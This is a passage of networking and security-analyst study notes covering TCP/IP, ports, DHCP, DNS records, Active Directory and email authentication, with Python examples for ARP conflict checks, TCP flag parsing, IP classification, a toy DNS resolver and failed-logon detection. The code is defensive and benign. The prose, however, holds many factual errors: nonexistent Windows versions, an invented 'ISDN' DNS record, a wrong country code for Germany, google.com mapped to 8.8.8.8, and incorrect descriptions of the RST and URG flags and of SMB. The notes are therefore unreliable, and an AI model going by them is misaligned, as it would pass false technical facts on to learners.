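    return {ip: sorted(macs) for ip, macs in table.items() if len(macs) > 1}


def check_static_bindings(table, bindings):
    """Compare observed claims against trusted static IP->MAC bindings (gateway,
    servers). Returns {ip: [unexpected MACs]} for every binding that was contradicted."""
    deviations = {}
    for ip, mac in bindings.items():
        unexpected = sorted(table.get(ip, set()) - {mac.lower()})
        if unexpected:
            deviations[ip] = unexpected
    return deviations


if __name__ == "__main__":
    table = build_arp_table(SAMPLE_ARP_REPLIES)
    print("conflicts:", find_conflicts(table))
    print("gateway deviations:", check_static_bindings(table, {"10.10.10.1": "00:AB:CD:11:10:EF"}))
    print("RARP for de:ad:be:ef:00:01:", reverse_lookup(table, "DE:AD:BE:EF:00:01"))
```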

Legacy: Older or outdated or EOL or EOS

End point authentication mechanisms
Kerberos - Mutual authentication (port 88)
NTLM
SAML - One way authentication

Network authentication: RADIUS, TACACS+

Application authentication: OpenID Connect with OAuth 2.0, SAML, JWT (GET and POST)

Cloud side authentication: AD (on premise or cloud AD) along with IAM with group policies and multifactor authentication

Server authentication: By providing username and password (Windows)
By providing username and password along with private key
Differences between TCP and UDP
TCP | UDP
TCP is the Transmission control protocol | UDP is the User datagram protocol
TCP is a connection oriented protocol | UDP is a connectionless protocol
TCP is reliable | UDP is non reliable
TCP uses segments as its data format | UDP uses datagrams as its data format
TCP is slower | UDP is faster
TCP uses feedback or acknowledgement | There is no feedback or acknowledgement

Difference between router, switch and hub
Router | Switch | Hub
Router is an intelligent device | Switch is also an intelligent device | Non intelligent
Router falls under layer 3 (Network layer) | Switch falls under layer 2 (Data link) | Hub falls under layer 1 (Physical layer)
Router uses the logical address, called IP address | Switch uses the physical address, called MAC address | NA
Router uses IP packets as its data format | Switch uses frames | Hub uses raw bits
Router will support VPN | Switch will not support VPN | Hub also does not support VPN
Router will support internet | Switch will not support internet | Hub will not support internet
For routing, the router uses a mode called Route mode (L3 mode) or NAT mode | Switching uses a mode called Switch mode or Layer 2 mode | NA
Example routing protocols: RIP, OSPF, BGP, IGRP, EIGRP, etc. | Example protocols: STP, VRRP, HSRP | Example protocols: P2P, ADSL, SDSL

Note: A firewall can be deployed or implemented using Route mode (L3 mode or NAT mode).
A firewall can also be deployed using Switch mode (Layer 2 mode).

TCP packet: The TCP packet practical use case is, whenever any network related issues, outage issues, log onboarding issues or performance issues happen or occur, we will do a packet capture between source and destination and analyse it with TCP/IP layer analysis (Wireshark).

IP packet = IP header + Payload
IP header: S.IP - where the packet is originating; D.IP - where the packet is going
Payload: Message content or piece of written code
The IP packet practical use case is the same: whenever network related issues, outage issues, log onboarding issues or performance issues happen or occur, we do a packet capture between source and destination and analyse it with TCP/IP layer analysis (Wireshark).

TCP flags: can be used to confirm or audit whether messages are delivered between peer devices.

Types of TCP flags

1) SYN
2) ACK
3) FIN
4) RST
5) URG
6) PSH

Flag enabled = 1, flag disabled = 0

1) SYN (synchronization): when the SYN flag is enabled (SYN=1), the initial connection is initiated between the peer devices.
2) ACK (acknowledgement): when the ACK flag is enabled (ACK=1), feedback or confirmation from the server or client is confirmed.
3) FIN (finish): when the FIN flag is enabled (FIN=1), it is the last packet to be sent between the peer devices and no other packet is sent.
4) URG (urgent): when the URG flag is enabled (URG=1), the packet gets high priority and reaches the destination first, without waiting for the existing packets in the buffer or queue.
5) PSH (push): when the PSH flag is enabled (PSH=1), it pushes the existing packets available in the queue, but still follows the sequence.
6) RST (reset): when the RST flag is enabled (RST=1), a fresh connection is formed between source and destination after a packet is dropped.
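As an added example (not from the original notes), the following Python decodes the flags byte of a raw 20-byte TCP header and audits whether a capture contains a completed SYN, SYN/ACK, ACK handshake, the same check an analyst does in Wireshark. The header bytes, port numbers and sequence numbers are constructed here.

```python
"""Decode TCP flags from raw header bytes and audit a three-way handshake."""
import struct

# Bit positions of the six classic flags in the TCP header flags byte.
TCP_FLAG_BITS = {
    "FIN": 0x01, "SYN": 0x02, "RST": 0x04,
    "PSH": 0x08, "ACK": 0x10, "URG": 0x20,
}


def build_tcp_header(src_port, dst_port, seq, ack, flags):
    """Construct a minimal 20-byte TCP header (no options) for sample traffic.

    `flags` is an iterable of flag names such as ("SYN", "ACK")."""
    flag_byte = 0
    for name in flags:
        flag_byte |= TCP_FLAG_BITS[name]
    data_offset = 5 << 4          # 5 x 32-bit words = 20 bytes, no options
    window, checksum, urg_ptr = 65535, 0, 0
    return struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack,
                       data_offset, flag_byte, window, checksum, urg_ptr)


def parse_tcp_header(raw):
    """Return the fields a packet analyst looks at first: ports, seq/ack, flags."""
    if len(raw) < 20:
        raise ValueError("TCP header must be at least 20 bytes")
    (src, dst, seq, ack, off_res, flag_byte,
     window, _chk, _urg) = struct.unpack("!HHIIBBHHH", raw[:20])
    flags = [n for n, bit in TCP_FLAG_BITS.items() if flag_byte & bit]
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "header_len": (off_res >> 4) * 4, "flags": flags, "window": window}


def handshake_completed(headers):
    """Audit a capture: True only if SYN, SYN/ACK and ACK appear in order with
    consistent sequence/acknowledgement numbers (ack = peer seq + 1)."""
    if len(headers) < 3:
        return False
    syn, synack, ack = (parse_tcp_header(h) for h in headers[:3])
    if sorted(syn["flags"]) != ["SYN"]:
        return False
    if sorted(synack["flags"]) != ["ACK", "SYN"] or synack["ack"] != syn["seq"] + 1:
        return False
    if sorted(ack["flags"]) != ["ACK"] or ack["ack"] != synack["seq"] + 1:
        return False
    return True


# Constructed sample exchange: client port 51000 -> server port 443.
CLIENT_ISN, SERVER_ISN = 1000, 5000
SAMPLE_HANDSHAKE = [
    build_tcp_header(51000, 443, CLIENT_ISN, 0, ("SYN",)),
    build_tcp_header(443, 51000, SERVER_ISN, CLIENT_ISN + 1, ("SYN", "ACK")),
    build_tcp_header(51000, 443, CLIENT_ISN + 1, SERVER_ISN + 1, ("ACK",)),
]
# Same attempt, but the server answers with RST (port closed): no handshake.
SAMPLE_REFUSED = [
    build_tcp_header(51000, 443, CLIENT_ISN, 0, ("SYN",)),
    build_tcp_header(443, 51000, 0, CLIENT_ISN + 1, ("RST", "ACK")),
]

if __name__ == "__main__":
    for raw in SAMPLE_HANDSHAKE:
        h = parse_tcp_header(raw)
        print(f"{h['src_port']} -> {h['dst_port']} flags={h['flags']}")
    print("handshake completed:", handshake_completed(SAMPLE_HANDSHAKE))
    print("refused attempt completed:", handshake_completed(SAMPLE_REFUSED))
```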

TCP/IP layers: it is an advanced version of the OSI layers. It contains four layers.

TCP/IP layers (TCP/IP reference model)

Layer number   OSI reference model   TCP/IP layers                      Data unit
7              Application           Application                        Data
6              Presentation          Application                        Data
5              Session               Application                        Data
4              Transport             Transport                          Segments / datagrams
3              Network               Internet                           IP packets
2              Data link             Network interface or Ethernet      Frames
1              Physical              Network interface or Ethernet      Raw bits

Practical use: network traffic analysis

1) Log onboarding
2) Network outage related issues
3) Performance related issues (server, network and also application)

Wireshark: latest version 4.4

It provides network traffic analysis between source and destination using PCAP (packet capture) or tcpdump analysis, following the TCP/IP reference model:

Application layer: between source and destination, verify client-side errors or server-side errors, and that all the HTTP requests and HTTP responses are happening properly using OpenID Connect with OAuth 2.0 and the JWT token-based mechanism; additionally, verify whether the DNS records are configured properly or not.
Transport layer: between source and destination, verify that all the TCP flags are configured properly and whether the TCP 3-way handshake is completed successfully or not.
Network or Internet layer: between source and destination, verify the packet routing: packet retransmitted, packet blocked, packet allowed.
Network interface or Ethernet layer: is there any physical connectivity issue with the cables? Also check for VLAN configuration related issues, and whether the frames are causing any half-duplex or full-duplex issues.

NIC card (Network interface card) or NIC / Ethernet interface: it can be used to enable or connect systems into a LAN or WLAN.
The NIC card functions as a converter of electrical signals into data signals.

Physical address or MAC address: every Ethernet interface has a physical address, called the MAC address.

Note: a system can have more than one MAC address (one per Ethernet interface).

Bit length of the MAC address: 48 bits

Example: 00:AB:CD:EF:01:11

Serial number: every OEM vendor, at the time of manufacturing the product, provides a dedicated number for identification and tracking purposes. That number is called the serial number.

Note: every system has only one serial number.

Logical address or IP address: to every system we assign a numerical number or label. That address is called the IP address.

Example: 10.10.10.1

Versions of the IP packet:
1) IPv4 - 32 bit
2) IPv6 - 128 bit

Why are we migrating from IPv4 to IPv6?

1) Lack of IPv4 addresses
2) Security purposes

Where IP addresses are obtained from: IANA - Internet Assigned Numbers Authority

Classes of IP addresses (private and public): there are 5 classes of IP addresses

Class              Range
Class A            0.0.0.0 - 126.255.255.255
Class B            128.0.0.0 - 191.255.255.255
Class C            192.0.0.0 - 223.255.255.255
Class D            224.0.0.0 - 239.255.255.255
Class E            240.0.0.0 - 255.255.255.255
Loopback address   127.0.0.1

Private IP address ranges
10.0.0.0 - 10.255.255.255          Class A
172.16.0.0 - 172.31.255.255        Class B
192.168.0.0 - 192.168.255.255      Class C

How to identify whether a security incident or attack is internal (insider threat) or external? Based on the IP address.

1) A DoS attack is happening through 172.32.0.0? External attacker (172.32.0.0 is outside the 172.16.0.0 - 172.31.255.255 private range)
2) Data exfiltration is happening via 192.168.1.1? Insider threat

Insider threat: if the attack is happening within the organization, by an employee, it is called an insider threat.
Ex: sending project-related code from a business email id to a personal email id

External attack: if the attack is coming from a public IP range we can call it an external attack.
Ex: phishing email coming from 1.1.1.1
SQL injection attack happening from 2.2.2.1

Bit           0 or 1
Byte          8 bits
Octet         8 bits
Decimal       base 10 (any number)
Hexadecimal   base 16

Subnet: a larger network divided into smaller networks; each smaller network is called a subnet.

For example, the IP address range of the overall organization:

10.10.0.0/16     Overall IP address range     65536 addresses
10.10.10.0/24    End user LAN                 256 addresses
10.10.20.0/24    Server LAN
10.10.30.0/24    DB
10.10.40.0/24    Development
10.10.50.0/24    Testing

Subnet mask for /8:    11111111.00000000.00000000.00000000 = 255.0.0.0
Subnet mask for /16:   11111111.11111111.00000000.00000000 = 255.255.0.0
Subnet mask for /17:   11111111.11111111.10000000.00000000 = 255.255.128.0
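The two triage questions above (which class and private range an address falls in, hence insider vs. external) and the subnet-mask derivation, as one added Python example that is not part of the original notes. The sample addresses are the ones used in the notes; the "local" verdict for loopback is an assumption added here.

```python
"""Classify an IPv4 address the way the notes do (class, private/loopback,
insider vs. external) and derive a subnet mask from a prefix length."""
import ipaddress

# Private ranges from the notes (RFC 1918) with the class the notes assign them.
PRIVATE_RANGES = [
    (ipaddress.ip_network("10.0.0.0/8"), "A"),
    (ipaddress.ip_network("172.16.0.0/12"), "B"),
    (ipaddress.ip_network("192.168.0.0/16"), "C"),
]


def address_class(ip):
    """Return the classful letter (A-E) from the first octet, or 'loopback'."""
    first = int(ipaddress.IPv4Address(ip)) >> 24
    if first == 127:
        return "loopback"
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def is_private(ip):
    addr = ipaddress.IPv4Address(ip)
    return any(addr in net for net, _ in PRIVATE_RANGES)


def classify_source(ip):
    """Triage verdict used in the notes: private source -> insider threat,
    public source -> external attacker; loopback -> a local process (assumed)."""
    if address_class(ip) == "loopback":
        return "local"
    return "insider threat" if is_private(ip) else "external attacker"


def subnet_mask(prefix_len):
    """Return (dotted mask, dotted binary, address count) for a /prefix."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length must be 0..32")
    mask_int = (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF
    octets = [(mask_int >> shift) & 0xFF for shift in (24, 16, 8, 0)]
    dotted = ".".join(str(o) for o in octets)
    binary = ".".join(f"{o:08b}" for o in octets)
    return dotted, binary, 2 ** (32 - prefix_len)


def subnet_of(ip, prefix_len):
    """Which subnet of the organisation plan an address belongs to."""
    return str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False))


if __name__ == "__main__":
    for src in ("172.32.0.0", "192.168.1.1", "1.1.1.1", "127.0.0.1"):
        print(f"{src:>14}  class {address_class(src):<8} -> {classify_source(src)}")
    for p in (8, 16, 17, 24):
        dotted, binary, count = subnet_mask(p)
        print(f"/{p:<3} {binary}  {dotted:<15} {count} addresses")
    print(subnet_of("10.10.20.37", 24))   # falls in the server LAN of the plan
```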

Ports and Protocols

Port: a numerical or software-defined number that is used for communication between peer devices.

Protocol number: it identifies what type of service is running, what type of process is running or what type of application is running against the port.

Types of ports
1) Open ports
2) Closed ports
3) Filtered ports

Which ports are better? Closed ports are always better, for security reasons. In case any dangerous ports are left open, an attacker or intruder will use pen-test tools and port scanning to get into the organization; in that way the attacker gains unauthorised access or causes sensitive data exposure.

How to verify which ports are open on the system? cmd>netstat

How many ports are available in total on each and every system? Total number of ports in any system: 0-65535 (65536)

Regular or well-known ports used for communication: 0-1023 (1024)

Business requirement / business exception: in case any of the org's internal stakeholders (DevOps, storage, backup, Windows, Unix, middleware, ML/AI, app developers, cloud computing etc.) require a port to be opened, they have to follow the process below:
1) The internal stakeholder has to fill in the firewall template
2) Create a ticket in the ticketing tool and assign it to the firewall team
3) The firewall risk assessment team will verify or validate the request and will do a BIA (business impact analysis)
4) After the firewall risk assessment team completes the risk analysis and BIA, they will assign the ticket to the firewall implementation team
5) The firewall implementation team will raise a change request as part of the change management process, and will implement it in the prod environment after the approval is accepted by the CAB director
6) The firewall implementation team will implement the policy in the firewall

Firewall template
Rule name                                  Source IP                    Destination IP             Source zone   Destination zone   Protocol   Port number
1) Application development                 10.10.10.1 (web server)      10.10.10.2 (Oracle DB IP)  Internal      Internal           https      8443
2) Copying or data transfer between the    PostgreSQL DB IP address     Oracle DB IP address       Internal      Internal           FTP        20 & 21
   PostgreSQL database and the Oracle DB

Protocol, importance and port number

FTP (File Transfer Protocol): for transferring files (it is not a secure protocol). Port: 20 and 21
SFTP (Secure File Transfer Protocol): transferring files in a secure way. Port: 22
SSH (Secure Shell): to log in to a Unix OS using the PuTTY application. Port: 22
SCP (Secure Copy): copying data in a secure way. Port: 22
Telnet (Telecommunication Network): to log in from one Unix OS into another Unix OS. Port: 23
SMTP (Simple Mail Transfer Protocol): to send and receive emails. Port: 25
DNS (Domain Name System): to convert a domain name into an IP address, or an IP address into a domain name or FQDN. Port: 53
DHCP (Dynamic Host Configuration Protocol): allocates an IP address to the end-user system automatically using the DORA process. Port: 67 & 68
Kerberos: mutual authentication for Windows OS (between the end user and AD/DC). Port: 88
NTP (Network Time Protocol): to sync or synchronize the local time with the tool time or network device time. Port: 123
IMAP (Internet Message Access Protocol): for sending or delivering messages we can use IMAP. Port: 143
POP3 (Post Office Protocol): for sending or delivering messages we can use the Post Office Protocol. Port: 110
NetBIOS (Network Basic Input/Output System): for rebooting the OS, configuring the OS and debugging purposes. Port: 137, 138 and 139
SNMP (Simple Network Management Protocol): for network discovery and also for managing and maintaining all the network devices. Port: 161
    There are 3 different versions of SNMP:
    1) SNMP version 1 (clear text, plain username and password)
    2) SNMP version 2 (clear text, plain username and password)
    3) SNMP version 3 (encrypted username and password)
LDAP (Lightweight Directory Access Protocol) / AD: to integrate with AD and to know the traceability of end users whenever a security incident has happened. Port: 389
LDAPS (Lightweight Directory Access Protocol Secure): to integrate with AD and to know the traceability of end users whenever a security incident has happened, in a secure way. Port: 636
RDP (Remote Desktop Protocol): to log in from one Windows OS to another Windows OS. Port: 3389
HTTP (Hypertext Transfer Protocol): web browsing, to access any websites or applications (data transfer in clear or plain text, without any encryption). Port: 80
HTTPS (Hypertext Transfer Protocol Secure): web browsing, to access any websites or applications in a secure way (data transfer in an encrypted channel; additionally it provides authenticity, authorization, integrity, non-repudiation and encryption). Port: 443 / 8443
Syslog (System Logging): to store system logs we can use syslog. Port: 514
SMB (Server Message Block): for messaging or communication purposes. Port: 445
IPsec (Internet Protocol Security): it can be used for VPN connectivity. Port: 500
SIP (Session Initiation Protocol): connection initiation between two end users; it is a telecom service protocol. Port: 5060 and 5061
ICMP (Internet Control Message Protocol): it can be used for messaging purposes. There is no port number
MS SQL (Microsoft SQL): it can be used for DB configuration. Port: 1433 (TCP), 1434 (UDP)
SSL (Secure Sockets Layer): web browsing. Port: 443. Outdated or legacy
TLS (Transport Layer Security): web browsing in a secure way. Port: 443. It is the latest
1) Static IP: assigning a static or fixed IP address is called static IP. Used for the server LAN (for all the servers).

Advantages
1) To maintain high availability, in the case of servers, without impacting any business

Drawbacks or disadvantages
1) Maintaining the DB is complicated and also complex
2) One dedicated human being or human intervention is required to maintain the database
3) Lots of collisions or conflicts will occur if we assign the same IP address to multiple devices without maintaining a proper inventory

Note: to get automatic IP address allocation that is less time-consuming, and additionally without configuration-related or conflict-related issues, we can go for dynamic IP allocation (using a DHCP server).
Note 2: for servers we assign static IPs because of upgrade and availability issues at the time of reboot and also upgrading.

DHCP server: Dynamic Host Configuration Protocol

The DHCP server allocates IP addresses automatically, without any human intervention, using the DORA process, without any conflicts or difficulties, for a specific time period (lease time), over Wi-Fi and also over LAN.

DORA process
1) DISCOVER: whenever an end user connects through either Wi-Fi or the LAN network, a broadcast request goes to each and every system connected in the network
2) OFFER: the DHCP server responds back with "I am the DHCP server, how can I support?" as a response
3) REQUEST: the end user requests an IP address for a temporary time period, either through LAN or WLAN
4) ACKNOWLEDGEMENT: the DHCP server provides an acknowledgement after validating which free IP addresses are available, and assigns an IP address to the end-user machine automatically for a specific time period (the lease time)

Port numbers for client and DHCP server communication: 67 and 68

Use case for security incident investigations: 1) when a security incident has happened and details are missing in the security alert, if we want to know who has done what, we need to check with AD

2) DNS server: Domain Name System or server

It converts, resolves or maps a domain name into an IP address, and also an IP address into a domain name.
Example: google.com ---- 8.8.8.8
         google.com ---- 8.8.4.4

Why do we have to map domain names into IP addresses?

1) User friendly (easy to remember)
2) Due to security reasons (organizations should not expose private or public IPs to the public or the internet)

The alternative name for a domain name is FQDN - Fully Qualified Domain Name

Which server or protocol supports both TCP and UDP connections? DNS

Every organization maintains 4 DNS servers

Internal or private DNS servers   Primary
                                  Secondary or backup (high availability)
Public DNS servers                Primary
                                  Secondary or backup

DNS records
For converting a domain name into an IP address or vice versa we have to create a couple of records; those records are called DNS records.

There are several DNS records:

1) A record: it converts a domain name into an IPv4 address
2) AAAA record: it converts or resolves a domain name into an IPv6 address
3) PTR (reverse pointer) record: it converts an IPv4 or IPv6 address into a domain name. It is the opposite of the A and AAAA records
4) CNAME (canonical name) record: it converts one form of a web address into another form; for example gmail.com is converted into https://www.gmail.com
5) MX record (mail exchanger): for sending and also receiving email we have to create an MX record.
   Every email contains a couple of important technical parameters. Those parameters are
   1) SPF (Sender Policy Framework)
   2) DMARC (Domain-based Message Authentication, Reporting and Conformance)
   3) DKIM (DomainKeys Identified Mail)
   4) Domain keys (public keys)
   5) Return path
   6) IP address
   7) Domain name
6) ISDN record (Integrated Services Digital Network): to make international calls we have to create a record; that record is called the ISDN record
   International code -- 00 or +
   Country code --- 91 (India)
                    1 - USA and Canada
                    47 - Germany
                    971 - UAE
   Phone number, for example in India = 0091xxxxxxxxxx
7) HINFO record (host info record): it provides the DNS server host info like RAM, CPU, processor, SSD etc.
8) SOA record (Start of Authority): it provides the DNS administrator or authority details like name, contact, email address, info about the DNS zones, and also the configuration of the different types of DNS servers
9) NS record (name server): this record can be used to configure the main domain and sub-domains, and also based on geographical location
   Geographical location
   yahoo.com       NS records   USA
   yahoo.co.in     NS1          India
   yahoo.co.uk     NS2          UK
   yahoo.co.sg     NS3          UAE
   yahoo.co.au     NS4          Australia

   Domains and sub-domains
   google.com      NS record
   gmail.com       NS1
   Google Maps     NS2
   YouTube         NS3
   Google Meet     NS4
10) TXT record (text record): for text messages we can configure a TXT record
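How the A, AAAA, CNAME, PTR, MX and TXT records above work together in a resolver, as an added Python example that is not part of the original notes: a constructed zone for the reserved name example.com, forward lookup with CNAME chasing (and loop detection), reverse lookup, and MX ordering by preference. All addresses and hostnames in the zone are made up.

```python
"""A toy DNS zone and resolver showing how A/AAAA, CNAME, PTR, MX and TXT
records work together: forward lookup with CNAME chasing, reverse lookup,
and mail-server selection."""
import ipaddress

# Constructed zone data for a fictional organisation (example.com).
ZONE = {
    ("example.com.", "A"):           ["203.0.113.10"],
    ("example.com.", "AAAA"):        ["2001:db8::10"],
    ("www.example.com.", "CNAME"):   ["example.com."],
    ("mail.example.com.", "A"):      ["203.0.113.25"],
    ("mail2.example.com.", "A"):     ["203.0.113.26"],
    ("example.com.", "MX"):          [(10, "mail.example.com."), (20, "mail2.example.com.")],
    ("example.com.", "TXT"):         ["v=spf1 mx -all"],
    # A deliberately broken pair of CNAMEs pointing at each other.
    ("loop.example.com.", "CNAME"):  ["loop2.example.com."],
    ("loop2.example.com.", "CNAME"): ["loop.example.com."],
}


def reverse_name(ip):
    """Build the PTR owner name for an address (in-addr.arpa / ip6.arpa)."""
    return ipaddress.ip_address(ip).reverse_pointer + "."


# PTR records derived from the A/AAAA data (a real reverse zone stores them separately).
PTR = {reverse_name(ip): name
       for (name, rtype), values in ZONE.items() if rtype in ("A", "AAAA")
       for ip in values}


def lookup(name, rtype, max_cnames=8):
    """Resolve `name` for `rtype`, following CNAMEs like a resolver does.
    Returns the list of answers (empty if the name or record type is absent)."""
    name = name.lower().rstrip(".") + "."
    chain = []
    for _ in range(max_cnames):
        if (name, rtype) in ZONE:
            return ZONE[(name, rtype)]
        cname = ZONE.get((name, "CNAME"))
        if not cname:
            return []
        chain.append(name)
        name = cname[0]
        if name in chain:                  # CNAME loop: stop instead of spinning
            raise ValueError("CNAME loop detected: " + " -> ".join(chain))
    raise ValueError("CNAME chain too long")


def reverse_lookup(ip):
    """PTR lookup: IP address -> domain name (None if there is no PTR)."""
    return PTR.get(reverse_name(ip))


def mail_servers(domain):
    """MX lookup ordered by preference (lowest first), each host resolved to its A record."""
    mx = sorted(lookup(domain, "MX"))
    return [(pref, host, lookup(host, "A")) for pref, host in mx]


if __name__ == "__main__":
    print("www.example.com A   ->", lookup("www.example.com", "A"))
    print("example.com AAAA    ->", lookup("example.com", "AAAA"))
    print("203.0.113.25 PTR    ->", reverse_lookup("203.0.113.25"))
    print("MX for example.com  ->", mail_servers("example.com"))
    print("SPF (TXT)           ->", lookup("example.com", "TXT"))
```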

DHCP   Dynamic Host Configuration Protocol
DNS    Domain Name System
IPAM   IP address management

DDI solution: DHCP, DNS and IP address management (IPAM)

DDI vendors or tools

1) Microsoft
2) Infoblox
3) IBM
4) HP

DNS filtering (whitelisting or blacklisting of domains)
Note: gather the domains with which the organization does business by contacting all the stakeholders, whitelist only those business domains, and blacklist all the others.

3) Active Directory (AD): it provides a directory of all the systems or computers information like laptops, MACs, workstations, desktops and servers

AD group: grouping of similar types of employees in the organization is called an AD group

When does the security team have to contact the AD team, Windows admin team or sysadmin?
1) Integrating AD or LDAP with any security tool
2) When a security incident has happened and we don't know about tracking or tracing the end user: at the timestamp of the incident, who was connected to IP x?
   Alert     Username   IP address   Timestamp
   Malware   unknown    10.10.10.1   6 pm IST
3) Integrating AD logs into the SIEM tool

Types of AD
1) On-premise AD: it is in the inbuilt or physical data center, or on-premise location
2) Cloud-based AD: depending on which cloud service provider we have chosen, we have to create an AD VM or EC2 instance along with the AD groups

4) Domain controller (DC): it is a centralised authentication and authorization server

Example domains are

1) Infosys.com
2) Facebook.com
3) Accenture.com
4) Capgemini.com

Note: probability of end-user authentication (audit logs)
1) Successful authentication --- Event ID 4624
2) Failed authentication ------ Event ID 4625
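Detection logic over the 4624/4625 events above, as an added Python example that is not part of the original notes: the kind of rule a SIEM runs once AD logs are integrated, plus the "who was on IP x at that time" triage question. The events, usernames and field names are constructed here.

```python
"""Detection logic over Windows Security events 4624 (successful logon) and
4625 (failed logon), as a SIEM correlation rule would apply it."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in the shape a SIEM normalises them to.
SAMPLE_EVENTS = [
    {"time": "2024-09-26 06:55:01", "event_id": 4625, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 06:55:09", "event_id": 4625, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 06:55:17", "event_id": 4625, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 06:55:24", "event_id": 4625, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 06:55:31", "event_id": 4625, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 06:56:02", "event_id": 4624, "user": "jdoe",   "src_ip": "10.10.10.1"},
    {"time": "2024-09-26 07:01:00", "event_id": 4625, "user": "asmith", "src_ip": "10.10.20.5"},
    {"time": "2024-09-26 07:30:00", "event_id": 4624, "user": "asmith", "src_ip": "10.10.20.5"},
]


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Return {(user, src_ip): count} for sources with >= threshold 4625 events
    inside any sliding window of the given length (password guessing)."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            failures[(e["user"], e["src_ip"])].append(parse_time(e["time"]))
    bursts = {}
    for key, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                bursts[key] = max(bursts.get(key, 0), end - start + 1)
    return bursts


def failures_then_success(events, min_failures=3, window=timedelta(minutes=10)):
    """Guessing that may have worked: >= min_failures 4625 for a user/IP followed
    by a 4624 from the same user/IP within the window. Returns (user, ip, time)."""
    hits = []
    recent = defaultdict(list)
    for e in sorted(events, key=lambda x: parse_time(x["time"])):
        key = (e["user"], e["src_ip"])
        t = parse_time(e["time"])
        if e["event_id"] == 4625:
            recent[key].append(t)
        elif e["event_id"] == 4624:
            fails = [f for f in recent[key] if t - f <= window]
            if len(fails) >= min_failures:
                hits.append((e["user"], e["src_ip"], e["time"]))
            recent[key].clear()
    return hits


def who_was_on_ip(events, ip, at_time):
    """Incident triage: last account that logged on (4624) from `ip` at or before `at_time`."""
    t = parse_time(at_time)
    logons = [e for e in events
              if e["event_id"] == 4624 and e["src_ip"] == ip and parse_time(e["time"]) <= t]
    return max(logons, key=lambda e: parse_time(e["time"]))["user"] if logons else None


if __name__ == "__main__":
    print("bursts:", failed_logon_bursts(SAMPLE_EVENTS))
    print("failures then success:", failures_then_success(SAMPLE_EVENTS))
    print("10.10.10.1 at 07:00 ->", who_was_on_ip(SAMPLE_EVENTS, "10.10.10.1", "2024-09-26 07:00:00"))
```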

5) DB (database server): the DB server maintains the collection of the entire organization's data (end users, confidential or org data)

Data = collection of information

Types of data

1) Critical
2) Non-critical data

Data classification types (organization point of view)
1) Internal or private
2) Restricted
3) Public or external

In the case of personal data, the data types are

1) PII data (Personally Identifiable Information)   GDPR - General Data Protection Regulation
2) PHI (Personal Health Information)                HIPAA - Health Insurance Portability and Accountability Act

Note: most of the databases support a query language
1) SQL - Structured Query Language
2) PGSQL - PostgreSQL structured language
3) AQL - Ariel Query Language
4) KQL - Kusto Query Language
5) MS SQL

Vendors or tools
1) Microsoft
2) SQL
3) Oracle
4) PostgreSQL
5) MongoDB
6) Cassandra
7) SAP
8) GridGain
9) Couchbase

6) Windows servers
Windows OS on the endpoint side (LT, WS, DT)    Windows server list
1) Windows XP                                    1) Windows 2008 R1 and R2
2) Windows Vista                                 2) Windows 2010
3) Windows 7                                     3) Windows 2012
4) Windows 8 and 8.1 or Windows 8.x              4) Windows 2016
5) Windows 9                                     5) Windows 2019
6) Windows 10                                    6) Windows 2021
7) Windows 11                                    7) Windows 2022

7) Unix servers: under Unix OS there are different types of flavours of OS
1) RHEL            RHEL 1.x to 9.x
2) CentOS          CentOS 1.x to 10.x
3) Ubuntu
4) Fedora
5) SUSE
6) Docker
7) Container
8) Amazon Linux

8) Application server or web server: an application server can be used to host any application or website

Applications can be accessed by either internal employees or the external public
For the internal employee side: timesheet update, income tax declaration, HR portal, payslip download, internal applications based on roles and responsibilities
For external applications: public or customers or clients or vendors, job seekers

Application 3-tier architecture
1) User layer - front end
2) Business or logical layer
3) DB layer

Network 3-tier architecture (Cisco)
1) NGFW or FW
2) Proxy or web gateway or secure web gateway
3) NIDS/NIPS

9) File server: it is a centralised file server and it can manage and maintain all the files of the different stakeholders of the organization (ML/AI, app development, testers, HR, legal, NOC, SOC, security etc.)

Note: the file server manager or administrator, based on the team side, can provide access, grants or permissions to access the files

10) SMTP server or email server or exchange server or UCS (unified communication server) or O365 or Outlook: to send emails and to receive emails we can use the SMTP server
Port number: 25

Every email contains a couple of technical and non-technical parameters. Those parameters are

Technical
1) SPF (Sender Policy Framework)
2) DMARC (Domain-based Message Authentication, Reporting and Conformance)
3) DKIM (DomainKeys Identified Mail)
4) DK (DomainKeys)
5) Return path
6) IP address
7) Domain validation
8) Header analyser
9) URL link
10) Malware attachment

Non-technical
1) Subject line
2) Message ID
3) CC - carbon copy
4) BCC - blind carbon copy
5) Body of the content

SPF (Sender Policy Framework): it is an authentication mechanism; it can be used to prevent phishing emails from cyber criminals

DMARC (Domain-based Message Authentication, Reporting and Conformance): it is a combination of SPF and DKIM. It can be used for protecting against phishing emails

DKIM (DomainKeys Identified Mail): it is an authentication protocol; it can be used to provide a digital signature to make sure of the identity of the end user and also authenticity, confidentiality and encryption

Return path

Network Commands

1) IP address: to verify the IP address of a system
syntax
cmd>ipconfig
cmd>ipconfig /all

2) MAC address: to verify or find out the MAC address of the system
syntax
cmd>getmac

3) Ping command: to verify whether the peer device is up or down, running or not running, active or passive, online or offline
syntax
cmd>ping x.x.x.x
cmd>ping hostname.com

The ping command uses the ICMP protocol (Internet Control Message Protocol). It has type 0 to type 255 messages.

Type 0 = destination reachable, or echo reply
Type 3 = destination unreachable

Note: there are two possible attacks on the ping command side
1) Ping flood attack or ICMP flood attack: flooding of ICMP packets
2) Ping of death: the attacker sends an oversized packet

4) nslookup: it converts a domain name into an IP address, or an IP address into a domain name

